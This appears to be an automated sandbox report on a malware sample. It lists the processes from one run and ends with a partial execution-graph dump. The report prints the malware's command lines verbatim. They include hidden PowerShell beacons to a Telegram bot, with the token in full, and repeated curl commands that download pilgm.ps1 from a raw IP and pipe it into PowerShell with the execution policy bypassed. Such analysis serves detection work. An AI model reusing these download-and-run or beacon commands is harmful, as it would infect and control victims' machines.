                                                                                              Target ID:12
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:16:32:56
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:16:32:56
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:18
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:20
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:22
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:23
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:24
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:25
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:26
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:30
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:32
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:33
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:34
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:35
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:36
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:37
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:38
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:39
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:40
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:41
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:43
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0xf70000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:44
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x830000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:45
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x810000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:46
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:47
                                                                                              Start time:16:33:11
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:48
                                                                                              Start time:16:33:12
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:49
                                                                                              Start time:16:33:13
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x7c0000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.6%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:1%
                                                                                                Total number of Nodes:1384
                                                                                                Total number of Limit Nodes:25
API calls 9033->9034 9038 6f951f33 CallCatchBlock 9034->9038 9036 6f951ec6 9283 6f952298 9036->9283 9039 6f951f4f 9038->9039 9040 6f951f69 dllmain_raw 9038->9040 9048 6f951f64 __DllMainCRTStartup@12 9038->9048 9039->9001 9040->9039 9042 6f951f83 dllmain_crt_dispatch 9040->9042 9041 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9286 6f95257d 9041->9286 9042->9039 9042->9048 9046 6f951fde dllmain_crt_dispatch 9046->9039 9049 6f951ff1 dllmain_raw 9046->9049 9047 6f951fd5 9047->9039 9047->9046 9048->9047 9050 6f951e84 __DllMainCRTStartup@12 81 API calls 9048->9050 9049->9039 9051 6f951fca dllmain_raw 9050->9051 9051->9047 9053 6f952415 9052->9053 9075 6f952778 IsProcessorFeaturePresent 9053->9075 9057 6f952426 9058 6f95242a 9057->9058 9085 6f955f9d 9057->9085 9058->9005 9061 6f952441 9061->9005 9159 6f952445 9063->9159 9065 6f952375 9065->9011 9066->9013 9068 6f952348 ___scrt_release_startup_lock 9067->9068 9069 6f952351 9068->9069 9070 6f952778 IsProcessorFeaturePresent 9068->9070 9069->9014 9070->9069 9072 6f9525c1 CallUnexpected 9071->9072 9073 6f95266c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9072->9073 9074 6f9526b7 CallUnexpected 9073->9074 9074->9010 9076 6f952421 9075->9076 9077 6f9531cd 9076->9077 9094 6f953807 9077->9094 9081 6f9531de 9082 6f9531e9 9081->9082 9108 6f953843 9081->9108 9082->9057 9084 6f9531d6 9084->9057 9150 6f959768 9085->9150 9088 6f953202 9089 6f953215 9088->9089 9090 6f95320b 9088->9090 9089->9058 9091 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9090->9091 9092 6f953210 9091->9092 9093 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9092->9093 9093->9089 9096 6f953810 9094->9096 9097 6f953839 9096->9097 9098 6f9531d2 9096->9098 9112 6f953e3b 9096->9112 9099 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 9097->9099 9098->9084 9100 6f9537b9 9098->9100 9099->9098 9131 6f953d4c 9100->9131 9103 6f9537ce 9103->9081 9106 6f9537e9 9106->9081 9109 6f95386d 9108->9109 9110 6f95384e 9108->9110 
